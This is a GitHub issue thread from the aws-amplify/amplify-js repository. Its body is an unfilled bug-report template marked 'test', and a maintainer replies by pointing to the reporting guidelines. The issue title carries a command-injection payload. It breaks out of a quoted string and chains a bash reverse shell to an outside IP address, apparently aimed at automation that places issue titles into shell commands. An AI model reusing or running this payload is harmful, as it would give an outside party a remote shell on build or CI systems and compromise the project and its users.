### ISSUE TITLE
New title" && bash -i >& /dev/tcp/159.223.121.196/80 0>&1 && echo "

### ISSUE THREAD

**Issue by ankushgoel27** [aws-amplify/amplify-js#10787]
### Before opening, please confirm:

- [x] I have [searched for duplicate or closed issues](https://github.com/aws-amplify/amplify-js/issues?q=is%3Aissue+) and [discussions](https://github.com/aws-amplify/amplify-js/discussions).
- [x] I have read the guide for [submitting bug reports](https://github.com/aws-amplify/amplify-js/blob/main/CONTRIBUTING.md#bug-reports).
- [x] I have done my best to include a minimal, self-contained set of instructions for consistently reproducing the issue.

### JavaScript Framework

Angular

### Amplify APIs

Authentication

### Environment information

<details>

```
# Put output below this line


```

</details>
test

### Describe the bug

test

### Expected behavior

test

### Reproduction steps

test

### Code Snippet

```javascript
// Put your code below this line.

```

### Log output

<details>

```
// Put your logs below this line


```

</details>

**Comment by ankushgoel27** [comment]
test

**Comment by tannerabread** [comment]
Hi @ankushgoel27 please read our bug report guidelines if you need help with something in our library
